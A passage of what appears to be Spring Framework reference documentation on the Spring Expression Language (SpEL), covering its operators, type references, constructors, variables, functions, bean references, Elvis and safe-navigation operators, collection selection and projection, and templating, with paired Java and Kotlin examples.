2\").getValue(Boolean.class);\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\"2 < -5.0\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\"'black' < 'block'\").getValue(Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\"2 == 2\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\"2 < -5.0\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\"'black' < 'block'\").getValue(Boolean::class.java)\n----\n\n[NOTE]\n====\nGreater-than and less-than comparisons against `null` follow a simple rule: `null` is treated as\nnothing (that is NOT as zero). As a consequence, any other value is always greater\nthan `null` (`X > null` is always `true`) and no other value is ever less than nothing\n(`X < null` is always `false`).\n\nIf you prefer numeric comparisons instead, avoid number-based `null` comparisons\nin favor of comparisons against zero (for example, `X > 0` or `X < 0`).\n====\n\nIn addition to the standard relational operators, SpEL supports the `instanceof` and regular\nexpression-based `matches` operator. The following listing shows examples of both:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\n\t\t\t\"'xyz' instanceof T(Integer)\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\n\t\t\t\"'5.00' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean.class);\n\n\t\/\/evaluates to false\n\tboolean falseValue = parser.parseExpression(\n\t\t\t\"'5.0067' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\n\t\t\t\"'xyz' instanceof T(Integer)\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\n\t\t\t\"'5.00' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean::class.java)\n\n\t\/\/evaluates to false\n\tval falseValue = parser.parseExpression(\n\t\t\t\"'5.0067' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean::class.java)\n----\n\nCAUTION: Be careful with primitive types, as they are immediately boxed up to the wrapper type,\nso `1 instanceof T(int)` evaluates to `false` while `1 instanceof T(Integer)`\nevaluates to `true`, as expected.\n\nEach symbolic operator can also be specified as a purely alphabetic equivalent. This\navoids problems where the symbols used have special meaning for the document type in\nwhich the expression is embedded (such as in an XML document). The textual equivalents are:\n\n* `lt` (`<`)\n* `gt` (`>`)\n* `le` (`\\<=`)\n* `ge` (`>=`)\n* `eq` (`==`)\n* `ne` (`!=`)\n* `div` (`\/`)\n* `mod` (`%`)\n* `not` (`!`).\n\nAll of the textual operators are case-insensitive.\n\n\n[[expressions-operators-logical]]\n==== Logical Operators\n\nSpEL supports the following logical operators:\n\n* `and` (`&&`)\n* `or` (`||`)\n* `not` (`!`)\n\nThe following example shows how to use the logical operators\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ -- AND --\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\"true and false\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tString expression = \"isMember('Nikola Tesla') and isMember('Mihajlo Pupin')\";\n\tboolean trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean.class);\n\n\t\/\/ -- OR --\n\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\"true or false\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tString expression = \"isMember('Nikola Tesla') or isMember('Albert Einstein')\";\n\tboolean trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean.class);\n\n\t\/\/ -- NOT --\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\"!true\").getValue(Boolean.class);\n\n\t\/\/ -- AND and NOT --\n\tString expression = \"isMember('Nikola Tesla') and !isMember('Mihajlo Pupin')\";\n\tboolean falseValue = parser.parseExpression(expression).getValue(societyContext, Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ -- AND --\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\"true and false\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval expression = \"isMember('Nikola Tesla') and isMember('Mihajlo Pupin')\"\n\tval trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean::class.java)\n\n\t\/\/ -- OR --\n\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\"true or false\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval expression = \"isMember('Nikola Tesla') or isMember('Albert Einstein')\"\n\tval trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean::class.java)\n\n\t\/\/ -- NOT --\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\"!true\").getValue(Boolean::class.java)\n\n\t\/\/ -- AND and NOT --\n\tval expression = \"isMember('Nikola Tesla') and !isMember('Mihajlo Pupin')\"\n\tval falseValue = parser.parseExpression(expression).getValue(societyContext, Boolean::class.java)\n----\n\n\n[[expressions-operators-mathematical]]\n==== Mathematical Operators\n\nYou can use the addition operator on both numbers and strings. You can use the subtraction, multiplication,\nand division operators only on numbers. You can also use\nthe modulus (%) and exponential power (^) operators. Standard operator precedence is enforced. The\nfollowing example shows the mathematical operators in use:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ Addition\n\tint two = parser.parseExpression(\"1 + 1\").getValue(Integer.class); \/\/ 2\n\n\tString testString = parser.parseExpression(\n\t\t\t\"'test' + ' ' + 'string'\").getValue(String.class); \/\/ 'test string'\n\n\t\/\/ Subtraction\n\tint four = parser.parseExpression(\"1 - -3\").getValue(Integer.class); \/\/ 4\n\n\tdouble d = parser.parseExpression(\"1000.00 - 1e4\").getValue(Double.class); \/\/ -9000\n\n\t\/\/ Multiplication\n\tint six = parser.parseExpression(\"-2 * -3\").getValue(Integer.class); \/\/ 6\n\n\tdouble twentyFour = parser.parseExpression(\"2.0 * 3e0 * 4\").getValue(Double.class); \/\/ 24.0\n\n\t\/\/ Division\n\tint minusTwo = parser.parseExpression(\"6 \/ -3\").getValue(Integer.class); \/\/ -2\n\n\tdouble one = parser.parseExpression(\"8.0 \/ 4e0 \/ 2\").getValue(Double.class); \/\/ 1.0\n\n\t\/\/ Modulus\n\tint three = parser.parseExpression(\"7 % 4\").getValue(Integer.class); \/\/ 3\n\n\tint one = parser.parseExpression(\"8 \/ 5 % 2\").getValue(Integer.class); \/\/ 1\n\n\t\/\/ Operator precedence\n\tint minusTwentyOne = parser.parseExpression(\"1+2-3*8\").getValue(Integer.class); \/\/ -21\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ Addition\n\tval two = parser.parseExpression(\"1 + 1\").getValue(Int::class.java) \/\/ 2\n\n\tval testString = parser.parseExpression(\n\t\t\t\"'test' + ' ' + 'string'\").getValue(String::class.java) \/\/ 'test string'\n\n\t\/\/ Subtraction\n\tval four = parser.parseExpression(\"1 - -3\").getValue(Int::class.java) \/\/ 4\n\n\tval d = parser.parseExpression(\"1000.00 - 1e4\").getValue(Double::class.java) \/\/ -9000\n\n\t\/\/ Multiplication\n\tval six = parser.parseExpression(\"-2 * -3\").getValue(Int::class.java) \/\/ 6\n\n\tval twentyFour = parser.parseExpression(\"2.0 * 3e0 * 4\").getValue(Double::class.java) \/\/ 24.0\n\n\t\/\/ Division\n\tval minusTwo = parser.parseExpression(\"6 \/ -3\").getValue(Int::class.java) \/\/ -2\n\n\tval one = parser.parseExpression(\"8.0 \/ 4e0 \/ 2\").getValue(Double::class.java) \/\/ 1.0\n\n\t\/\/ Modulus\n\tval three = parser.parseExpression(\"7 % 4\").getValue(Int::class.java) \/\/ 3\n\n\tval one = parser.parseExpression(\"8 \/ 5 % 2\").getValue(Int::class.java) \/\/ 1\n\n\t\/\/ Operator precedence\n\tval minusTwentyOne = parser.parseExpression(\"1+2-3*8\").getValue(Int::class.java) \/\/ -21\t\n----\n\n\n[[expressions-assignment]]\n==== The Assignment Operator\n\nTo setting a property, use the assignment operator (`=`). This is typically\ndone within a call to `setValue` but can also be done inside a call to `getValue`. The\nfollowing listing shows both ways to use the assignment operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tInventor inventor = new Inventor();\n\tEvaluationContext context = SimpleEvaluationContext.forReadWriteDataBinding().build();\n\n\tparser.parseExpression(\"Name\").setValue(context, inventor, \"Aleksandar Seovic\");\n\n\t\/\/ alternatively\n\tString aleks = parser.parseExpression(\n\t\t\t\"Name = 'Aleksandar Seovic'\").getValue(context, inventor, String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval inventor = Inventor()\n\tval context = SimpleEvaluationContext.forReadWriteDataBinding().build()\n\n\tparser.parseExpression(\"Name\").setValue(context, inventor, \"Aleksandar Seovic\")\n\n\t\/\/ alternatively\n\tval aleks = parser.parseExpression(\n\t\t\t\"Name = 'Aleksandar Seovic'\").getValue(context, inventor, String::class.java)\n----\n\n\n[[expressions-types]]\n=== Types\n\nYou can use the special `T` operator to specify an instance of `java.lang.Class` (the\ntype). Static methods are invoked by using this operator as well. The\n`StandardEvaluationContext` uses a `TypeLocator` to find types, and the\n`StandardTypeLocator` (which can be replaced) is built with an understanding of the\n`java.lang` package. This means that `T()` references to types within `java.lang` do not need to be\nfully qualified, but all other type references must be. The following example shows how\nto use the `T` operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tClass dateClass = parser.parseExpression(\"T(java.util.Date)\").getValue(Class.class);\n\n\tClass stringClass = parser.parseExpression(\"T(String)\").getValue(Class.class);\n\n\tboolean trueValue = parser.parseExpression(\n\t\t\t\"T(java.math.RoundingMode).CEILING < T(java.math.RoundingMode).FLOOR\")\n\t\t\t.getValue(Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval dateClass = parser.parseExpression(\"T(java.util.Date)\").getValue(Class::class.java)\n\n\tval stringClass = parser.parseExpression(\"T(String)\").getValue(Class::class.java)\n\n\tval trueValue = parser.parseExpression(\n\t\t\t\"T(java.math.RoundingMode).CEILING < T(java.math.RoundingMode).FLOOR\")\n\t\t\t.getValue(Boolean::class.java)\n----\n\n\n\n[[expressions-constructors]]\n=== Constructors\n\nYou can invoke constructors by using the `new` operator. You should use the fully qualified class name\nfor all but the primitive types (`int`, `float`, and so on) and String. The following\nexample shows how to use the `new` operator to invoke constructors:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tInventor einstein = p.parseExpression(\n\t\t\t\"new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German')\")\n\t\t\t.getValue(Inventor.class);\n\n\t\/\/create new inventor instance within add method of List\n\tp.parseExpression(\n\t\t\t\"Members.add(new org.spring.samples.spel.inventor.Inventor(\n\t\t\t\t'Albert Einstein', 'German'))\").getValue(societyContext);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval einstein = p.parseExpression(\n\t\t\t\"new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German')\")\n\t\t\t.getValue(Inventor::class.java)\n\n\t\/\/create new inventor instance within add method of List\n\tp.parseExpression(\n\t\t\t\"Members.add(new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German'))\")\n\t\t\t.getValue(societyContext)\n----\n\n\n\n[[expressions-ref-variables]]\n=== Variables\n\nYou can reference variables in the expression by using the `#variableName` syntax. Variables\nare set by using the `setVariable` method on `EvaluationContext` implementations.\n\n[NOTE]\n====\nValid variable names must be composed of one or more of the following supported\ncharacters.\n\n* letters: `A` to `Z` and `a` to `z`\n* digits: `0` to `9`\n* underscore: `_`\n* dollar sign: `$`\n====\n\nThe following example shows how to use variables.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tInventor tesla = new Inventor(\"Nikola Tesla\", \"Serbian\");\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadWriteDataBinding().build();\n\tcontext.setVariable(\"newName\", \"Mike Tesla\");\n\n\tparser.parseExpression(\"Name = #newName\").getValue(context, tesla);\n\tSystem.out.println(tesla.getName()) \/\/ \"Mike Tesla\"\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval tesla = Inventor(\"Nikola Tesla\", \"Serbian\")\n\n\tval context = SimpleEvaluationContext.forReadWriteDataBinding().build()\n\tcontext.setVariable(\"newName\", \"Mike Tesla\")\n\n\tparser.parseExpression(\"Name = #newName\").getValue(context, tesla)\n\tprintln(tesla.name) \/\/ \"Mike Tesla\"\n----\n\n\n[[expressions-this-root]]\n==== The `#this` and `#root` Variables\n\nThe `#this` variable is always defined and refers to the current evaluation object\n(against which unqualified references are resolved). The `#root` variable is always\ndefined and refers to the root context object. Although `#this` may vary as components of\nan expression are evaluated, `#root` always refers to the root. The following examples\nshow how to use the `#this` and `#root` variables:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ create an array of integers\n\tList<Integer> primes = new ArrayList<Integer>();\n\tprimes.addAll(Arrays.asList(2,3,5,7,11,13,17));\n\n\t\/\/ create parser and set variable 'primes' as the array of integers\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataAccess();\n\tcontext.setVariable(\"primes\", primes);\n\n\t\/\/ all prime numbers > 10 from the list (using selection ?{...})\n\t\/\/ evaluates to [11, 13, 17]\n\tList<Integer> primesGreaterThanTen = (List<Integer>) parser.parseExpression(\n\t\t\t\"#primes.?[#this>10]\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ create an array of integers\n\tval primes = ArrayList<Int>()\n\tprimes.addAll(listOf(2, 3, 5, 7, 11, 13, 17))\n\n\t\/\/ create parser and set variable 'primes' as the array of integers\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataAccess()\n\tcontext.setVariable(\"primes\", primes)\n\n\t\/\/ all prime numbers > 10 from the list (using selection ?{...})\n\t\/\/ evaluates to [11, 13, 17]\n\tval primesGreaterThanTen = parser.parseExpression(\n\t\t\t\"#primes.?[#this>10]\").getValue(context) as List<Int>\n----\n\n\n\n[[expressions-ref-functions]]\n=== Functions\n\nYou can extend SpEL by registering user-defined functions that can be called within the\nexpression string. The function is registered through the `EvaluationContext`. The\nfollowing example shows how to register a user-defined function:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tMethod method = ...;\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\tcontext.setVariable(\"myFunction\", method);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval method: Method = ...\n\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\tcontext.setVariable(\"myFunction\", method)\n----\n\nFor example, consider the following utility method that reverses a string:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic abstract class StringUtils {\n\n\t\tpublic static String reverseString(String input) {\n\t\t\tStringBuilder backwards = new StringBuilder(input.length());\n\t\t\tfor (int i = 0; i < input.length(); i++) {\n\t\t\t\tbackwards.append(input.charAt(input.length() - 1 - i));\n\t\t\t}\n\t\t\treturn backwards.toString();\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tfun reverseString(input: String): String {\n\t\tval backwards = StringBuilder(input.length)\n\t\tfor (i in 0 until input.length) {\n\t\t\tbackwards.append(input[input.length - 1 - i])\n\t\t}\n\t\treturn backwards.toString()\n\t}\n----\n\nYou can then register and use the preceding method, as the following example shows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\tcontext.setVariable(\"reverseString\",\n\t\t\tStringUtils.class.getDeclaredMethod(\"reverseString\", String.class));\n\n\tString helloWorldReversed = parser.parseExpression(\n\t\t\t\"#reverseString('hello')\").getValue(context, String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\tcontext.setVariable(\"reverseString\", ::reverseString::javaMethod)\n\n\tval helloWorldReversed = parser.parseExpression(\n\t\t\t\"#reverseString('hello')\").getValue(context, String::class.java)\n----\n\n\n\n[[expressions-bean-references]]\n=== Bean References\n\nIf the evaluation context has been configured with a bean resolver, you can\nlook up beans from an expression by using the `@` symbol. The following example shows how\nto do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tStandardEvaluationContext context = new StandardEvaluationContext();\n\tcontext.setBeanResolver(new MyBeanResolver());\n\n\t\/\/ This will end up calling resolve(context,\"something\") on MyBeanResolver during evaluation\n\tObject bean = parser.parseExpression(\"@something\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = StandardEvaluationContext()\n\tcontext.setBeanResolver(MyBeanResolver())\n\n\t\/\/ This will end up calling resolve(context,\"something\") on MyBeanResolver during evaluation\n\tval bean = parser.parseExpression(\"@something\").getValue(context)\n----\n\nTo access a factory bean itself, you should instead prefix the bean name with an `&` symbol.\nThe following example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tStandardEvaluationContext context = new StandardEvaluationContext();\n\tcontext.setBeanResolver(new MyBeanResolver());\n\n\t\/\/ This will end up calling resolve(context,\"&foo\") on MyBeanResolver during evaluation\n\tObject bean = parser.parseExpression(\"&foo\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = StandardEvaluationContext()\n\tcontext.setBeanResolver(MyBeanResolver())\n\n\t\/\/ This will end up calling resolve(context,\"&foo\") on MyBeanResolver during evaluation\n\tval bean = parser.parseExpression(\"&foo\").getValue(context)\n----\n\n\n[[expressions-operator-ternary]]\n=== Ternary Operator (If-Then-Else)\n\nYou can use the ternary operator for performing if-then-else conditional logic inside\nthe expression. The following listing shows a minimal example:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tString falseString = parser.parseExpression(\n\t\t\t\"false ? 'trueExp' : 'falseExp'\").getValue(String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval falseString = parser.parseExpression(\n\t\t\t\"false ? 'trueExp' : 'falseExp'\").getValue(String::class.java)\n----\n\nIn this case, the boolean `false` results in returning the string value `'falseExp'`. A more\nrealistic example follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tparser.parseExpression(\"Name\").setValue(societyContext, \"IEEE\");\n\tsocietyContext.setVariable(\"queryName\", \"Nikola Tesla\");\n\n\texpression = \"isMember(#queryName)? #queryName + ' is a member of the ' \" +\n\t\t\t\"+ Name + ' Society' : #queryName + ' is not a member of the ' + Name + ' Society'\";\n\n\tString queryResultString = parser.parseExpression(expression)\n\t\t\t.getValue(societyContext, String.class);\n\t\/\/ queryResultString = \"Nikola Tesla is a member of the IEEE Society\"\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tparser.parseExpression(\"Name\").setValue(societyContext, \"IEEE\")\n\tsocietyContext.setVariable(\"queryName\", \"Nikola Tesla\")\n\n\texpression = \"isMember(#queryName)? #queryName + ' is a member of the ' \" + \"+ Name + ' Society' : #queryName + ' is not a member of the ' + Name + ' Society'\"\n\n\tval queryResultString = parser.parseExpression(expression)\n\t\t\t.getValue(societyContext, String::class.java)\n\t\/\/ queryResultString = \"Nikola Tesla is a member of the IEEE Society\"\n----\n\nSee the next section on the Elvis operator for an even shorter syntax for the\nternary operator.\n\n\n\n[[expressions-operator-elvis]]\n=== The Elvis Operator\n\nThe Elvis operator is a shortening of the ternary operator syntax and is used in the\nhttp:\/\/www.groovy-lang.org\/operators.html#_elvis_operator[Groovy] language.\nWith the ternary operator syntax, you usually have to repeat a variable twice, as the\nfollowing example shows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes\"]\n----\n\tString name = \"Elvis Presley\";\n\tString displayName = (name != null ? name : \"Unknown\");\n----\n\nInstead, you can use the Elvis operator (named for the resemblance to Elvis' hair style).\nThe following example shows how to use the Elvis operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\tString name = parser.parseExpression(\"name?:'Unknown'\").getValue(new Inventor(), String.class);\n\tSystem.out.println(name); \/\/ 'Unknown'\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\tval name = parser.parseExpression(\"name?:'Unknown'\").getValue(Inventor(), String::class.java)\n\tprintln(name) \/\/ 'Unknown'\n----\n\nThe following listing shows a more complex example:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\tInventor tesla = new Inventor(\"Nikola Tesla\", \"Serbian\");\n\tString name = parser.parseExpression(\"Name?:'Elvis Presley'\").getValue(context, tesla, String.class);\n\tSystem.out.println(name); \/\/ Nikola Tesla\n\n\ttesla.setName(null);\n\tname = parser.parseExpression(\"Name?:'Elvis Presley'\").getValue(context, tesla, String.class);\n\tSystem.out.println(name); \/\/ Elvis Presley\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\tval tesla = Inventor(\"Nikola Tesla\", \"Serbian\")\n\tvar name = parser.parseExpression(\"Name?:'Elvis Presley'\").getValue(context, tesla, String::class.java)\n\tprintln(name) \/\/ Nikola Tesla\n\n\ttesla.setName(null)\n\tname = parser.parseExpression(\"Name?:'Elvis Presley'\").getValue(context, tesla, String::class.java)\n\tprintln(name) \/\/ Elvis Presley\n----\n\n[NOTE]\n=====\nYou can use the Elvis operator to apply default values in expressions. The following\nexample shows how to use the Elvis operator in a `@Value` expression:\n\n[source,java,indent=0,subs=\"verbatim,quotes\"]\n----\n\t@Value(\"#{systemProperties['pop3.port'] ?: 25}\")\n----\n\nThis will inject a system property `pop3.port` if it is defined or 25 if not.\n=====\n\n\n[[expressions-operator-safe-navigation]]\n=== Safe Navigation Operator\n\nThe safe navigation operator is used to avoid a `NullPointerException` and comes from\nthe http:\/\/www.groovy-lang.org\/operators.html#_safe_navigation_operator[Groovy]\nlanguage. Typically, when you have a reference to an object, you might need to verify that\nit is not null before accessing methods or properties of the object. To avoid this, the\nsafe navigation operator returns null instead of throwing an exception. The following\nexample shows how to use the safe navigation operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\tInventor tesla = new Inventor(\"Nikola Tesla\", \"Serbian\");\n\ttesla.setPlaceOfBirth(new PlaceOfBirth(\"Smiljan\"));\n\n\tString city = parser.parseExpression(\"PlaceOfBirth?.City\").getValue(context, tesla, String.class);\n\tSystem.out.println(city); \/\/ Smiljan\n\n\ttesla.setPlaceOfBirth(null);\n\tcity = parser.parseExpression(\"PlaceOfBirth?.City\").getValue(context, tesla, String.class);\n\tSystem.out.println(city); \/\/ null - does not throw NullPointerException!!!\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\tval tesla = Inventor(\"Nikola Tesla\", \"Serbian\")\n\ttesla.setPlaceOfBirth(PlaceOfBirth(\"Smiljan\"))\n\n\tvar city = parser.parseExpression(\"PlaceOfBirth?.City\").getValue(context, tesla, String::class.java)\n\tprintln(city) \/\/ Smiljan\n\n\ttesla.setPlaceOfBirth(null)\n\tcity = parser.parseExpression(\"PlaceOfBirth?.City\").getValue(context, tesla, String::class.java)\n\tprintln(city) \/\/ null - does not throw NullPointerException!!!\n----\n\n\n\n[[expressions-collection-selection]]\n=== Collection Selection\n\nSelection is a powerful expression language feature that lets you transform a\nsource collection into another collection by selecting from its entries.\n\nSelection uses a syntax of `.?[selectionExpression]`. It filters the collection and\nreturns a new collection that contain a subset of the original elements. For example,\nselection lets us easily get a list of Serbian inventors, as the following example shows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tList<Inventor> list = (List<Inventor>) parser.parseExpression(\n\t\t\t\"Members.?[Nationality == 'Serbian']\").getValue(societyContext);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval list = parser.parseExpression(\n\t\t\t\"Members.?[Nationality == 'Serbian']\").getValue(societyContext) as List<Inventor>\n----\n\nSelection is possible upon both lists and maps. For a list, the selection\ncriteria is evaluated against each individual list element. Against a map, the\nselection criteria is evaluated against each map entry (objects of the Java type\n`Map.Entry`). Each map entry has its key and value accessible as properties for use in\nthe selection.\n\nThe following expression returns a new map that consists of those elements of the original map\nwhere the entry value is less than 27:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tMap newMap = parser.parseExpression(\"map.?[value<27]\").getValue();\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval newMap = parser.parseExpression(\"map.?[value<27]\").getValue()\n----\n\n\nIn addition to returning all the selected elements, you can retrieve only the\nfirst or the last value. To obtain the first entry matching the selection, the syntax is\n`.^[selectionExpression]`. To obtain the last matching selection, the syntax is\n`.$[selectionExpression]`.\n\n\n\n[[expressions-collection-projection]]\n=== Collection Projection\n\nProjection lets a collection drive the evaluation of a sub-expression, and the\nresult is a new collection. The syntax for projection is `.![projectionExpression]`. For\nexample, suppose we have a list of inventors but want the list of\ncities where they were born. Effectively, we want to evaluate 'placeOfBirth.city' for\nevery entry in the inventor list. The following example uses projection to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ returns ['Smiljan', 'Idvor' ]\n\tList placesOfBirth = (List)parser.parseExpression(\"Members.![placeOfBirth.city]\");\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ returns ['Smiljan', 'Idvor' ]\n\tval placesOfBirth = parser.parseExpression(\"Members.![placeOfBirth.city]\") as List<*>\n----\n\nYou can also use a map to drive projection and, in this case, the projection expression is\nevaluated against each entry in the map (represented as a Java `Map.Entry`). The result\nof a projection across a map is a list that consists of the evaluation of the projection\nexpression against each map entry.\n\n\n\n[[expressions-templating]]\n=== Expression templating\n\nExpression templates allow mixing literal text with one or more evaluation blocks.\nEach evaluation block is delimited with prefix and suffix characters that you can\ndefine. A common choice is to use `#{ }` as the delimiters, as the following example\nshows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tString randomPhrase = parser.parseExpression(\n\t\t\t\"random number is #{T(java.lang.Math).random()}\",\n\t\t\tnew TemplateParserContext()).getValue(String.class);\n\n\t\/\/ evaluates to \"random number is 0.7038186818312008\"\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval randomPhrase = parser.parseExpression(\n\t\t\t\"random number is #{T(java.lang.Math).random()}\",\n\t\t\tTemplateParserContext()).getValue(String::class.java)\n\n\t\/\/ evaluates to \"random number is 0.7038186818312008\"\n----\n\nThe string is evaluated by concatenating the literal text `'random number is '` with the\nresult of evaluating the expression inside the `#{ }` delimiter (in this case, the result\nof calling that `random()` method). The second argument to the `parseExpression()` method\nis of the type `ParserContext`. The `ParserContext` interface is used to influence how\nthe expression is parsed in order to support the expression templating functionality.\nThe definition of `TemplateParserContext` follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class TemplateParserContext implements ParserContext 